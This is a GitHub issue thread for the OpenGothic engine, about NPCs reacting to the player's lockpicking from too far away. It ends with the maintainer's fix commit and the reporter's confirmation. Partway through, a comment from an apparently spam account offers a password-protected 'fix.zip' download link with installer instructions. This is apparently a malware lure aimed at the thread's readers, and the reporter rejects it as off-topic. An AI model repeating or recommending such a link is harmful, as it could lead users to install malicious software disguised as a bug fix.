### ISSUE TITLE
Too attentive npcs

### ISSUE THREAD

**Issue by YALdysse** [Try/OpenGothic#677]
**Describe the bug**

**OS:** `Linux Mint 21.2`
**OpenGothic:** `v1.0.2843` (commit 3f7214dd) 

In OpenGothic, npc have too good of hearing. When the hero tries to break into the chest and breaks the lockpick, the npc hear it from a long distance and run to catch the thief.

**Save-game/Log-file/Screenshots/Video**
[video](https://drive.google.com/file/d/1s5R4VxQxvmxsoJZJySAd7sHZrFUJeD3b/view?usp=sharing)
[save](https://drive.google.com/file/d/1XHyoI0lxzrciV4zLdte5zotZwEhR28lD/view?usp=sharing)

**Application log**
[log.txt](https://github.com/user-attachments/files/16745902/log.txt)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YALdysse** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

@Qsgz2023ji5ban, You have entered the wrong topic.

**Comment by Try** [comment]
Hi @YALdysse !

After testing the save: distance (10m) is correct, but Knight was wrongly reacting to player touching the chest. Should be fixed by [5b702d1](https://github.com/Try/OpenGothic/commit/5b702d17b02a75ad9384de67b1a18796acca0e5b)

**Comment by YALdysse** [comment]
@Try.
It works. Thank you.
